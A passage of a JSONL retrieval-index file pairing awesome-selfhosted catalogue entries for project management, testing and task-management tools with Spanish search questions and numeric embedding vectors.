management system/tool [AGPL-3.0, PHP].", "indexar": "con quΓ© puedo montar un sistema para planificar y colaborar en equipos pequeΓ±os?", "v": [0.1195, 0.18548, -0.18932, -0.15426, -0.08184, -0.13534, 0.03758, 0.06528, -0.2013, -0.22958, -0.13554, 0.05434, 0.10075, -0.05982, 0.09025, 0.05082, 0.04546, -0.07288, 0.06192, 0.0217, -0.03337, -0.06177, -0.04036, 0.00894, 0.02067, 0.00425, 0.05223, -0.03971, -0.16937, 0.10976, -0.00551, 0.16159, 0.06221, 0.02502, 0.00241, -0.03525, 0.04227, 0.03563, 0.02789, -0.12006, -0.12944, -0.02514, -0.03693, -0.02484, 0.04905, 0.06723, -0.06549, -0.07369, 0.05357, -0.00718, -0.01928, 0.06094, -0.00099, -0.09895, -0.03216, -0.0787, 0.10884, -0.10388, 0.00941, -0.07739, -0.0148, 0.0462, -0.02533, 0.03049, 0.09034, 0.08422, -0.13168, -0.00237, -0.09689, 0.02071, -0.00849, -0.03162, 0.03148, -0.12447, -0.02803, 0.08463, 0.08486, 0.03191, 0.06065, -0.00017, 0.05365, 0.05918, -0.01814, 0.10002, 0.07926, 0.00311, -0.01281, 0.05891, 0.05585, -0.0531, 0.01513, -0.01941, 0.02381, -0.05847, 0.06261, -0.01516, 0.13884, 0.0877, -0.04332, 0.05151, -0.05711, -0.0517, -0.07411, 0.13019, -0.06559, 0.02997, 0.07576, 0.01911, 0.05829, -0.07833, -0.0061, -0.00562, -0.04133, -0.00173, -0.08279, -0.1118, -0.02647, 0.02748, -0.02804, 0.00147, -0.03681, 0.10671, 0.04421, -0.00277, 0.09774, -0.02227, 0.0906, 0.09326, 0.0368, 0.05644, 0.02713, 0.00958, -0.03212, 0.00889, -0.0281, 0.03897, -0.02506, 0.01504, -0.03591, 0.01513, 0.00837, 0.00329, 0.005, -0.12947, 0.02732, 0.05142, 0.09257, -0.08133, 0.03553, -0.01693, 0.00172, 0.08107, 0.00361, -0.02647, -0.01671, 0.01333, 0.02923, -0.01812, -0.00302, 0.04086, -0.04728, -0.00247, 0.03981, -0.01835, 0.04252, -0.04649, 0.02583, -0.06607, 0.09218, 0.01523, 0.0292, 0.01682, 0.06451, -0.05584, 0.05251, 0.00187, -0.04234, -0.03302, 0.02533, -0.01952, -0.06971, 0.04704, -0.00376, 0.08546, -0.03241, 0.04401, 0.01863, 0.02805, 0.01988, -0.01213, 0.07793, 0.02048, 0.046, -0.0108, 0.0475, -0.0138, -0.01326, -0.04252, 0.01268, 0.02312, 0.00628, 0.057, 0.06203, -0.02305, -0.00251, 0.01181, -0.0309, 0.08404, 0.0506, 0.10772, 0.09221, -0.01455, -0.01189, -0.0515, -0.07997, 0.0826, -0.0873, 0.00769, 0.0055, 0.04809, 0.0434, -0.00261, 0.05177, -0.00925, 0.0378, 0.01401, 0.01729, 0.02405, 0.04145, -0.01793, -0.03949, -0.05637, -0.02713, 0.00982, -0.03239, -0.03286, 0.02677, 0.02134, -0.02852, -0.01051, 0.04061, 0.07741, 0.05383, -0.04963, 0.01081, -0.04956, -0.04719, 0.00236, -0.00269, -0.08271, -0.01239, 0.07527, 0.01933, -0.07056, -0.00696, -0.01505]} -{"tipo": "pregunta", "herramienta": "Software Development - Project Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Project Management", "tema": "software development - project management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Project Management: Titra β€” Time-tracking solution for freelancers and small teams [GPL-3.0, Javascript/Docker]. Trac β€” Trac is an enhanced wiki and issue tracking system for software development projects [BSD-3-Clause, Python/deb]. Traq β€” Project management and issue tracking system written in PHP [GPL-3.0, PHP/Nodejs]. Tuleap β€” Tuleap is a libre suite to plan, track, code and collaborate on software projects [GPL-2.0, PHP]. UVDesk β€” UVDesk community is a service oriented, event driven extensible opensource helpdesk system that can be used by your organization to provide efficient support to your clients effortlessly whichever way you imagine [MIT, PHP]. ZenTao β€” An agile(scrum) project management system/tool [AGPL-3.0, PHP].", "indexar": "cual es una alternativa libre a los sistemas de gestiΓ³n Γ‘gil como scrum?", "v": [-0.0031, -0.01368, -0.05862, -0.00512, 0.00414, -0.07235, -0.13662, -0.07622, -0.14047, 0.06446, -0.10702, -0.11436, -0.06512, 0.01349, 0.21634, -0.07977, -0.0335, -0.14063, -0.02622, 0.14041, -0.04855, 0.02031, -0.01807, -0.06366, -0.09278, -0.07511, 0.08754, -0.02991, -0.07061, -0.02619, -0.02391, 0.05838, 0.15656, -0.22001, 0.01751, -0.0225, 0.02846, 0.09156, 0.01543, 0.00122, -0.08792, -0.11387, -0.03338, 0.09979, 0.11558, -0.12362, -0.07081, 0.06588, -0.01612, 0.01358, -0.20373, 0.00245, -0.05054, -0.07788, 0.11579, -0.01437, 0.04027, -0.11729, -0.00482, -0.06248, -0.02627, 0.07408, 0.07159, -0.03301, 0.06704, 0.05683, -0.06383, -0.02333, -0.06848, 0.10463, 0.05008, -0.02153, 0.00097, -0.014, 0.03526, 0.03807, 0.0215, 0.10036, -0.04645, -0.01353, 0.08345, -0.10572, -0.02452, 0.05108, -0.07735, -0.11743, 0.03467, -0.05071, 0.00714, 0.02913, 0.02078, -0.03808, 0.00468, 0.03848, -0.00389, -0.05323, -0.00021, 0.06198, 0.03648, 0.04881, -0.01001, 0.03184, -0.15752, 0.0363, -0.02646, -0.00014, 0.03706, -0.03518, -0.00941, 0.01638, -0.07109, 0.01069, 0.0126, 0.02763, -0.03632, -0.08687, 0.0317, 0.02225, -0.02896, 0.01172, -0.03003, -0.04906, -0.00645, -0.07856, 0.08794, -0.01769, 0.07433, 0.0496, 0.01164, 0.04223, 0.03109, -0.03515, -0.11209, -0.04826, -0.04541, -0.04617, 0.08441, -0.00334, 0.04153, -0.02847, -0.07606, 0.08692, 0.01835, -0.04328, 0.06625, 0.00041, 0.01675, -0.06613, -0.03637, -0.02322, -0.06698, 0.02396, -0.02651, 0.08971, -0.0813, 0.00665, -0.00123, -0.0224, -0.13195, 0.07705, 0.00576, -0.01736, -0.03426, 0.05878, -0.00254, -0.04513, 0.00825, -0.00084, 0.00217, 0.02184, 0.02278, 0.09584, -0.02351, -0.06121, 0.04912, -0.09205, -0.02067, -0.13482, 0.09591, -0.04288, -0.03845, 0.03471, -0.09917, 0.01144, -0.00907, -0.02603, -0.04517, -0.00034, 0.00057, 0.09722, 0.02373, 0.03, -0.04588, -0.06473, -0.0165, -0.01515, -0.04058, -0.03155, 0.01193, -0.02433, -0.12093, -0.00883, 0.01671, -0.04031, -0.03321, 0.06054, -0.0321, 0.07015, 0.02522, 0.1031, 0.0607, 0.03782, 0.06977, 0.02447, -0.07055, -0.02048, 0.05693, -0.03014, 0.01252, -0.07983, 0.05704, 0.01345, 0.03418, 0.05228, -0.00114, 0.00378, 0.02263, 0.05473, -0.00537, 0.02858, 0.00905, -0.02431, -0.00501, 0.01327, 0.03503, -0.00516, 0.05885, -0.03852, -0.0471, -0.06133, 0.04345, 0.13402, -0.053, -0.07594, -0.04067, -0.06022, -0.12717, -0.00766, -0.02312, -0.06811, -0.02692, 0.02496, 0.00356, -0.00966, 0.00736, -0.04222]} -{"tipo": "pregunta", "herramienta": "Software Development - Testing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Testing", "tema": "software development - testing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Testing: Bencher β€” Suite of continuous benchmarking tools designed to catch performance regressions in CI [MIT/Apache-2.0, Rust]. Request Inbox β€” Collect and inspect HTTP requests for testing and debugging. Create and manage inboxes, capture detailed request data, configure custom responses [Apache-2.0, Docker]. WebHook Tester β€” Powerful tool for testing WebHooks and more [MIT, Docker/Go/deb/K8S].", "indexar": "que herramienta sirve para detectar regresiones de rendimiento en las pruebas continuas", "v": [-0.03507, 0.07782, -0.26367, -0.25307, 0.1628, -0.06041, -0.13207, -0.00038, 0.06044, -0.05879, -0.08186, 0.04146, -0.08496, -0.04086, 0.18467, 0.0978, -0.00857, -0.02243, -0.05992, -0.09259, -0.01478, -0.11429, -0.03961, -0.07376, 0.07872, 0.10547, -0.03706, -0.01639, -0.09361, -0.04203, 0.00944, -0.01472, 0.08391, -0.06477, -0.20431, -0.02388, -0.13954, 0.01924, 0.03633, 0.0976, 0.02189, 0.02137, -0.00896, -0.06218, 0.07287, -0.0293, -0.08062, 0.04014, -0.06316, -0.02152, -0.0071, -0.06981, -0.0188, -0.05513, -0.03469, -0.11449, 0.05329, -0.01853, 0.12015, -0.19354, -0.01431, 0.01768, -0.05128, -0.08694, 0.07819, -0.11272, -0.01969, -0.12732, -0.07467, 0.032, -0.02102, 0.08647, 0.06663, -0.02676, -0.07715, -0.02275, 0.04454, 0.09475, 0.03811, -0.00307, -0.00708, -0.05902, -0.06533, 0.0664, -0.08967, -0.06027, 0.05202, -0.00815, 0.09193, -0.08033, -0.05156, 0.07024, -0.06065, 0.04916, -0.0308, 0.02524, 0.13729, -0.06611, 0.01094, -0.01763, 0.15461, -0.0271, -0.01635, 0.06698, -0.01826, 0.05517, -0.03131, -0.00224, -0.09043, -0.02142, 0.0656, -0.07175, -0.0147, 0.00716, -0.04412, 0.0742, -0.03704, -0.04054, -0.02299, 0.03383, 0.00749, -0.02117, -0.03295, -0.03052, -0.04512, -0.07518, 0.02778, 0.01607, 0.07483, -0.02116, 0.03833, 0.04395, -0.08078, 0.02347, -0.01677, -0.0069, 0.05553, -0.06072, 0.00399, -0.01077, 0.08436, 0.07563, -0.01747, -0.07963, 0.07337, 0.0032, -0.00726, -0.00089, -0.04802, 0.0157, 0.00658, -0.03954, 0.03526, 0.02159, -0.06311, -0.02815, 0.07862, 0.01077, -0.01791, 0.05556, -0.06604, -0.00645, 0.04427, 0.07259, 0.03369, 0.01263, 0.03735, -0.00435, 0.06667, 0.05439, -0.00841, -0.03032, 0.03096, -0.09462, 0.06289, -0.02654, -0.00353, 0.00574, -0.02383, -0.06789, -0.04204, -0.01283, -0.04821, -0.06632, 0.03153, -0.04474, 0.01661, 0.03049, 0.06436, 0.03981, 0.07272, 0.02623, 0.01204, -0.05781, 0.02974, 0.01733, 0.01105, -0.05058, 0.06908, -0.01664, -0.08731, -0.04285, -0.03677, 0.05216, 0.03561, 0.04738, -0.04279, 0.00372, -0.01932, 0.00503, -0.00102, 0.03007, 0.09102, -0.02675, -0.07749, -0.01404, 0.03836, -0.03885, -0.09672, 0.05022, -0.00676, -0.00731, -0.00725, 0.03096, -0.01037, 0.01466, 0.0073, 0.009, 0.0865, -0.03008, 0.06785, 0.05315, -0.0057, 0.00272, -0.03597, -0.05862, 0.00848, -0.01596, -0.02161, -0.04937, -0.03443, 0.04814, 0.03645, -0.03261, -0.00587, -0.04189, 0.00791, -0.05065, 0.02073, -0.04813, -0.03631, -0.00748, 0.05172, -0.09889, 0.05764, 0.00711]} -{"tipo": "pregunta", "herramienta": "Software Development - Testing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Testing", "tema": "software development - testing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Testing: Bencher β€” Suite of continuous benchmarking tools designed to catch performance regressions in CI [MIT/Apache-2.0, Rust]. Request Inbox β€” Collect and inspect HTTP requests for testing and debugging. Create and manage inboxes, capture detailed request data, configure custom responses [Apache-2.0, Docker]. WebHook Tester β€” Powerful tool for testing WebHooks and more [MIT, Docker/Go/deb/K8S].", "indexar": "con que puedo capturar e inspeccionar peticiones HTTP para depuraciΓ³n", "v": [0.02471, 0.05217, -0.05152, -0.10146, 0.12486, -0.10094, 0.09725, 0.02792, 0.10229, 0.02695, -0.09685, 0.10894, 0.00625, -0.04517, -0.03971, 0.01083, 0.04466, 0.0125, 0.07346, -0.01168, 0.02075, 0.02377, -0.04166, -0.07464, -0.08923, -0.08878, 0.02777, 0.07559, -0.15949, -0.14612, 0.02071, -0.00021, -0.10033, 0.19619, -0.06706, -0.07452, -0.06383, 0.09893, -0.02864, 0.02532, 0.01907, 0.09095, -0.10198, -0.02614, -0.06385, -0.06353, 0.00382, -0.05932, -0.03124, -0.1322, 0.00518, 0.00428, -0.28365, 0.00595, -0.14577, 0.18441, 0.13523, -0.09405, 0.07346, -0.09227, -0.03588, -0.05552, 0.01148, -0.00574, 0.11896, -0.04356, -0.02583, 0.06501, -0.09165, 0.06265, 0.00242, 0.03418, 0.03256, -0.04587, 0.12767, 0.04568, -0.07665, -0.10237, -0.03788, 0.05747, -0.02247, -0.00454, -0.09183, 0.04979, -0.07851, 0.01135, -0.05723, -0.10597, 0.03742, -0.11067, 0.08474, 0.09824, 0.01034, -0.0193, -0.02025, -0.08435, -0.02188, -0.02761, -0.01622, 0.01612, -0.05191, -0.02471, -0.03835, 0.02711, 0.01876, 0.04395, 0.04152, -0.03378, 0.00516, -0.01111, -0.02803, 0.02708, -0.07953, 0.06051, -0.00724, -0.06086, -0.07859, -0.04188, 0.08259, -0.06517, -0.03172, -0.07352, -0.08949, -0.11691, 0.04742, 0.00097, -0.04172, -0.00505, 0.05545, -0.01682, -0.01464, 0.06368, -0.08157, -0.03163, -0.03147, 0.01872, 0.08378, -0.0546, -0.0403, -0.01141, -0.08011, -0.0251, -0.02518, -0.05874, 0.05551, 0.03249, 0.02452, -0.00234, -0.05926, -0.01086, 0.04632, -0.00668, -0.05187, -0.00202, -0.04276, 0.05198, 0.04561, -0.08194, -0.01895, 0.05961, 0.06275, 0.00255, 0.01661, -0.01442, 0.01292, 0.04595, -0.12183, -0.01496, 0.00983, -0.05288, -0.0259, 0.00853, -0.10805, -0.13091, -0.02098, -0.06495, -0.04337, -0.05753, 0.04606, -0.06628, -0.03413, 0.06743, -0.00095, -0.0013, 0.01603, -0.03217, 0.05467, 0.00448, 0.03726, 0.05333, 0.0549, -0.00092, -0.09242, 0.04418, -0.00925, -0.03681, -0.02182, 0.07241, 0.03808, 0.01771, -0.01193, -0.05551, 0.03166, -0.05825, -0.03288, -0.04037, -0.02056, 0.03161, -0.04595, -0.05359, 0.01415, 0.004, 0.07975, -0.06025, -0.02434, -0.0357, 0.10853, 0.08166, -0.04321, 0.03642, 0.01518, 0.05186, 0.04673, 0.08286, 0.03753, 0.00512, 0.04302, -0.00342, 0.0141, 0.00093, 0.00144, 0.03221, -0.0789, -0.03438, -0.00314, 0.05954, -0.0218, -0.01306, -0.04395, -0.00869, 0.04324, 0.02464, -0.07562, 0.01144, 0.04891, -0.03268, -0.08942, 0.00657, 0.05352, -0.0454, -0.06268, 0.05576, 0.0521, -0.02743, -0.00032, -0.03176]} -{"tipo": "pregunta", "herramienta": "Software Development - Testing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Software Development - Testing", "tema": "software development - testing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Software Development - Testing: Bencher β€” Suite of continuous benchmarking tools designed to catch performance regressions in CI [MIT/Apache-2.0, Rust]. Request Inbox β€” Collect and inspect HTTP requests for testing and debugging. Create and manage inboxes, capture detailed request data, configure custom responses [Apache-2.0, Docker]. WebHook Tester β€” Powerful tool for testing WebHooks and more [MIT, Docker/Go/deb/K8S].", "indexar": "cual es una alternativa libre para probar WebHooks y configuraciones automΓ‘ticas", "v": [0.00412, 0.07231, -0.14598, -0.03001, 0.04459, -0.04736, 0.04847, -0.03659, -0.21308, -0.11131, -0.1138, -0.16969, 0.0284, 0.0148, 0.05638, 0.0115, 0.13047, -0.17707, 0.02078, 0.10299, -0.02728, -0.03108, -0.14111, -0.05028, -0.0082, -0.12146, 0.12581, -0.01393, -0.20868, -0.07226, 0.03114, 0.00238, 0.07487, 0.02906, -0.01759, 0.05736, 0.02538, 0.06075, 0.15993, 0.00118, 0.05251, -0.07596, -0.07209, 0.11373, 0.05157, 0.05404, -0.05627, -0.02584, -0.04259, 0.01221, 0.02456, -0.02347, -0.06115, -0.01258, 0.02956, -0.06981, 0.22111, -0.12622, -0.01084, -0.08019, -0.00256, 0.04163, 0.01582, 0.04802, 0.04058, 0.03034, -0.07263, -0.01972, -0.03702, 0.12001, 0.05443, 0.00979, -0.00169, -0.06498, 0.05893, 0.08792, -0.04243, -0.00763, 0.08052, 0.03087, 0.03821, -0.05693, -0.0696, 0.04172, -0.05491, -0.07978, 0.01676, -0.12549, 0.0028, 0.02768, 0.13701, -0.056, 0.03478, 0.10022, 0.00611, -0.13146, 0.0753, 0.06325, 0.01848, 0.00121, 0.05197, 0.02227, -0.14156, 0.12288, -0.01342, 0.04148, 0.04238, 0.01293, -0.04868, -0.08414, 0.01154, 0.0026, -0.08007, 0.00557, 0.02224, -0.08107, 0.01176, 0.07196, -0.01196, -0.0604, -0.05527, 0.02001, -0.02407, -0.06095, 0.00655, 0.07574, 0.01154, 0.05617, -0.00268, 0.03688, 0.02621, -0.04994, -0.07224, -0.09236, -0.0556, 0.03562, 0.03127, -0.0293, -0.02143, -0.05995, 0.0202, 0.06788, -0.01238, -0.04641, 0.07131, -0.01786, 0.00196, -0.01058, -0.04219, 0.04343, -0.10066, 0.00165, 0.03484, 0.11274, -0.10498, 0.03135, -0.07975, -0.05616, -0.01592, 0.0999, 0.00043, 0.00132, 0.05055, 0.02607, 0.01325, 0.0564, -0.07772, -0.04528, 0.02156, -0.00919, -0.00712, 0.0588, -0.00829, -0.07475, 0.03442, -0.02127, -0.03488, -0.07813, 0.0321, -0.06534, 0.00741, -0.01088, -0.0695, -0.01829, 0.00157, -0.04437, 0.03943, -0.02394, 0.0591, 0.05163, -0.00591, 0.01651, -0.08812, -0.04227, 0.0282, 0.01118, -0.02645, -0.07982, -0.01723, -0.01282, -0.09032, -0.03142, -0.01885, -0.09805, -0.02582, 0.03843, -0.01507, 0.0261, -0.00387, 0.04084, 0.06537, -0.00111, 0.08863, -0.03519, -0.06603, 0.02225, 0.0592, -0.0477, -0.0518, 0.00644, 0.04162, 0.0138, 0.0462, 0.0181, -0.00291, 0.05932, 0.06256, 0.07658, 0.0249, -0.01526, -0.03974, 0.02587, -0.02441, -0.01762, 0.05018, 0.02372, 0.06295, 0.02895, -0.04629, -0.03087, 0.06976, 0.0621, -0.01439, -0.02159, -0.03584, -0.06991, -0.09913, -0.02787, -0.03093, -0.03793, -0.02788, 0.04535, -0.00827, -0.0472, 0.0274, 0.00619]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: 4ga Boards β€” Straightforward realtime kanban boards management for intuitive task tracking. Featuring an elegant dark mode, collapsible todo lists, and multitasking tools to supercharge your team's productivity [MIT, Nodejs/Docker/K8S]. AppFlowy β€” Build detailed lists of to-do’s for different projects while tracking the status of each one. Open Source Notion Alternative [AGPL-3.0, Rust/Dart/Docker]. dayGLANCE β€” Day planner with drag-and-drop time blocking, inbox, recurring tasks, habits, routines, goals, projects and Pomodoro focus mode, plus iCal and CalDAV calendar sync. Data stays in the browser, with optional WebDAV or GLANCEvault sync [MIT, Javascript/Docker]. Donetick β€” Task and chore management tool for personal and family use, with advanced scheduling, flexible assignment, and group sharing capabilities, detailed history, automation via API, simple and modern design [AGPL-3.0, Go/Docker]. Focus Flow β€” Complete ecosystem for time management using the Pomodoro technique [MIT, Docker/K8S].", "indexar": "que herramienta es como Notion pero para gestionar tareas", "v": [-0.04315, 0.10678, -0.10091, -0.20119, 0.04963, -0.05036, -0.05619, 0.10345, 0.01716, 0.04048, -0.10995, -0.02396, 0.09011, -0.04039, 0.06551, 0.08795, 0.10389, -0.11909, -0.0419, 0.12326, -0.12219, 0.08254, -0.00371, 0.04619, -0.08972, 0.00671, 0.05559, -0.08692, -0.16031, 0.15056, -0.02216, -0.04044, 0.11057, -0.2286, 0.01921, 0.0307, -0.07263, -0.00063, -0.03059, 0.03002, -0.05675, 0.13601, -0.11132, 0.09666, 0.08848, -0.03387, 0.04026, -0.07396, 0.0174, 0.08997, -0.0208, -0.1675, -0.0584, -0.02549, -0.01084, -0.13511, 0.17218, -0.12298, -0.03681, -0.15385, -0.14125, 0.0757, -0.05507, -0.0058, -0.00055, -0.01051, 0.06102, -0.04031, -0.05158, 0.14805, 0.03364, 0.01079, -0.00282, -0.00211, 0.00262, -0.03447, 0.0867, 0.09367, -0.01215, -0.04202, 0.05463, 0.04414, -0.08553, -0.01212, -0.05534, -0.13662, 0.0329, -0.01903, -0.02664, -0.06587, -0.08582, -0.0139, -0.08547, -0.08271, 0.02399, 0.08866, 0.06438, -0.02688, 0.01798, -0.00628, 0.11439, -0.03808, -0.06798, 0.07599, -0.06078, 0.08605, -0.0179, -0.00657, -0.02963, -0.01462, 0.00333, -0.00168, 0.02588, 0.01891, -0.02304, 0.10197, -0.00662, -0.05015, -0.00442, -0.0672, 0.01895, 0.02248, 0.01193, 0.02703, 0.0896, -0.0616, 0.03775, 0.05397, 0.05284, -0.05509, -0.04667, -0.03153, -0.04008, 0.02639, -0.012, 0.00798, 0.01563, -0.10987, -0.02549, -0.13833, -0.08602, 0.04486, 0.01831, -0.08419, 0.08128, 0.0215, 0.03139, -0.02852, 0.0166, 0.05129, 0.08754, -0.10979, 0.01672, 0.0448, -0.00055, 0.03829, -0.02258, 0.06975, -0.0867, 0.02308, -0.0419, -0.09215, 0.04116, 0.03925, -0.00698, -0.05735, 0.05121, 0.05112, 0.02358, 0.03492, -0.00751, -0.00469, 0.04347, -0.01693, 0.05185, -0.11957, 0.01234, -0.00889, 0.0573, -0.00921, 0.00026, 0.01983, 0.0243, -0.00075, 0.01391, -0.07559, -0.04054, 0.02787, -0.05284, 0.05985, 0.00076, -2e-05, 0.02591, -0.08738, 0.07463, -0.01302, -0.01319, -0.07649, -0.01808, 0.05201, -0.02763, -0.03908, 0.00513, -7e-05, -0.03262, 0.06224, -0.01777, 0.04504, 0.04816, -0.00375, 0.03199, -0.00319, 0.00285, -0.01392, -0.02121, -0.04409, -0.01821, 0.01195, -0.01409, -0.01013, 0.02316, 0.0031, 0.047, -0.03765, -0.00559, 0.01658, 0.02662, 0.04995, 0.00502, -0.00775, 0.03229, -0.01992, 0.01098, 0.03339, 0.02431, -0.07065, 0.03995, -0.00623, -0.03888, 0.00596, -0.00687, 0.02719, 0.03722, -0.03092, -0.08817, 0.02518, -0.01027, 0.00017, -0.05759, -0.04626, -0.05585, -0.01669, 0.05133, 0.01064, 0.02132, -0.02351]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: 4ga Boards β€” Straightforward realtime kanban boards management for intuitive task tracking. Featuring an elegant dark mode, collapsible todo lists, and multitasking tools to supercharge your team's productivity [MIT, Nodejs/Docker/K8S]. AppFlowy β€” Build detailed lists of to-do’s for different projects while tracking the status of each one. Open Source Notion Alternative [AGPL-3.0, Rust/Dart/Docker]. dayGLANCE β€” Day planner with drag-and-drop time blocking, inbox, recurring tasks, habits, routines, goals, projects and Pomodoro focus mode, plus iCal and CalDAV calendar sync. Data stays in the browser, with optional WebDAV or GLANCEvault sync [MIT, Javascript/Docker]. Donetick β€” Task and chore management tool for personal and family use, with advanced scheduling, flexible assignment, and group sharing capabilities, detailed history, automation via API, simple and modern design [AGPL-3.0, Go/Docker]. Focus Flow β€” Complete ecosystem for time management using the Pomodoro technique [MIT, Docker/K8S].", "indexar": "con quΓ© puedo montar un tablero kanban en tiempo real", "v": [0.00997, 0.02275, -0.1746, 0.07871, -0.10171, -0.0029, 0.06368, 0.11385, -0.16297, -0.07064, -0.04217, -0.11513, 0.08884, 0.004, 0.05567, 0.29514, -0.0369, -0.0168, 0.10574, -0.04684, 0.06486, -0.13359, -0.11922, -0.01745, 0.05138, -0.03105, 0.03791, -0.07313, -0.13113, 0.10755, 0.0469, 0.13238, 0.055, -0.01214, -0.04372, -0.06949, 0.10257, 0.10888, -0.09816, -0.03553, 0.06769, -0.06243, -0.07894, 0.02213, -0.02596, 0.01154, 0.04392, -0.06866, -0.11957, 0.12913, 0.00457, -0.07329, 0.07704, 0.02126, -0.07426, -0.14134, 0.13167, -0.01707, 0.09589, -0.00589, -0.06911, 0.04626, -0.04056, -0.0161, 0.04242, 0.09803, -0.04485, 0.11938, -0.07716, -0.0015, -0.13598, -0.10429, 0.05113, 0.01499, 0.0027, 0.01233, 0.00894, -0.03281, 0.02511, 0.00589, 0.01514, -0.04124, -0.02288, 0.17825, -0.03436, -0.02711, 0.10466, -0.11066, -0.00454, 0.04438, 0.02543, 0.12677, 0.14417, -0.0151, -0.0021, -0.06025, -0.03334, 0.03119, -0.06946, 0.05781, -0.0367, 0.07826, -0.08418, 0.1753, 0.02408, 0.03964, -0.00678, -0.07004, 0.01739, -0.0354, -0.03654, 0.04115, -0.11673, -0.02982, 0.02465, -0.02891, 0.02266, 0.00665, -0.05184, -0.02525, -0.01687, 0.09153, 0.08064, -0.00883, 0.02359, -0.0121, 0.08084, 0.06317, -0.06822, -0.01947, -0.03987, -0.00684, -0.07505, -0.03095, -0.04351, 0.00722, 0.00496, -0.00899, 0.01579, -0.03146, 0.02699, 0.03283, -0.08661, -0.12059, -0.0522, -0.00275, -0.05111, 0.0401, -0.05963, 0.04397, 0.03389, 0.07655, 0.11514, -0.00217, 0.0191, -0.07941, 0.02454, 0.06071, 0.00819, 0.00435, 0.06427, 0.06124, -0.02251, 0.00912, 0.03915, -0.00728, -0.05222, 0.07446, 0.06632, 0.01971, -0.05155, -0.00381, 0.0351, -0.0284, -0.02323, 0.01859, -0.00651, 0.00695, -0.04237, -0.02567, -0.00242, -0.00201, 0.03292, 0.02208, -0.01816, 0.04598, 0.06561, 0.02842, -0.01065, 0.03324, 0.03688, -0.0138, 0.05483, 0.075, -0.01015, 0.00093, 0.08044, 0.01203, 0.0476, -0.05855, 0.00766, -0.06267, 0.02227, -0.00224, 0.02896, 0.00164, -0.03314, 0.121, 0.03603, 0.01957, 0.05756, 0.03965, 0.00166, -0.02388, 0.02372, 0.00159, -0.01085, -0.05641, -0.01645, 0.00557, 0.00605, 0.01151, 0.05888, -0.01781, -0.06977, 0.01269, -0.02042, 0.05379, -0.01993, 0.03337, -0.0092, -0.01883, -0.0176, -0.00696, 0.00175, -0.00104, 0.04039, -0.0246, 0.00727, -0.02371, -0.02473, 0.06116, 0.01533, -0.03479, 0.00397, -0.03383, -0.0567, -0.01636, -0.01949, -0.09795, -0.05281, -0.03757, 0.01804, -0.05108, 0.01622, -0.01884]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: 4ga Boards β€” Straightforward realtime kanban boards management for intuitive task tracking. Featuring an elegant dark mode, collapsible todo lists, and multitasking tools to supercharge your team's productivity [MIT, Nodejs/Docker/K8S]. AppFlowy β€” Build detailed lists of to-do’s for different projects while tracking the status of each one. Open Source Notion Alternative [AGPL-3.0, Rust/Dart/Docker]. dayGLANCE β€” Day planner with drag-and-drop time blocking, inbox, recurring tasks, habits, routines, goals, projects and Pomodoro focus mode, plus iCal and CalDAV calendar sync. Data stays in the browser, with optional WebDAV or GLANCEvault sync [MIT, Javascript/Docker]. Donetick β€” Task and chore management tool for personal and family use, with advanced scheduling, flexible assignment, and group sharing capabilities, detailed history, automation via API, simple and modern design [AGPL-3.0, Go/Docker]. Focus Flow β€” Complete ecosystem for time management using the Pomodoro technique [MIT, Docker/K8S].", "indexar": "cual sirve para planificar el dΓ­a con bloques de tiempo y sincronizar con mi calendario", "v": [0.06153, 0.03723, -0.1344, -0.02344, 0.00912, -0.17306, 0.02813, 0.01786, -0.07485, -0.16034, -0.04252, -0.09056, 0.06188, -0.06587, 0.01208, 0.00533, -0.00895, -0.05259, 0.00825, 0.024, -0.09086, -0.00768, 0.01255, 0.00378, -0.1243, -0.10138, 0.0806, -0.00606, -0.26959, 0.00555, -0.06196, 0.03238, 0.12847, -0.02785, 0.12957, -0.02076, 0.0661, 0.21805, -0.19143, -0.10107, -0.08335, 0.03966, -0.05696, 0.04538, -0.00193, 0.02597, 0.04181, 0.10875, -0.07827, -0.02191, -0.10888, 0.04046, 0.04763, 0.10127, -0.04739, 0.02374, 0.07009, -0.07288, 0.00149, -5e-05, 0.00528, 0.01086, 0.00316, -0.03423, 0.06429, -0.03905, -0.08899, 0.07472, 0.00753, 0.0254, -0.05189, 0.00039, 0.08086, -0.08241, 0.04102, -0.03572, 0.10624, 0.08671, -0.04929, 0.03168, -0.03827, -0.04064, -0.04786, 0.09463, -0.05955, 0.1016, 0.07345, 0.12039, 0.02065, 0.052, -0.01061, 0.13526, 0.03266, 0.04043, 0.07309, -0.00567, 0.04318, 0.07835, 0.00804, -0.02288, 0.08618, -0.08726, -0.09524, 0.1142, -0.01909, 0.0802, 0.05711, 0.11169, 0.01469, -0.00224, -0.047, -0.07746, -0.11623, -0.08751, 0.0091, -0.0175, 0.04589, 0.00118, -0.03695, -0.06285, -0.01473, 0.06494, -0.01187, -0.03404, 0.05661, 0.04944, 0.09999, 0.0042, -0.00242, 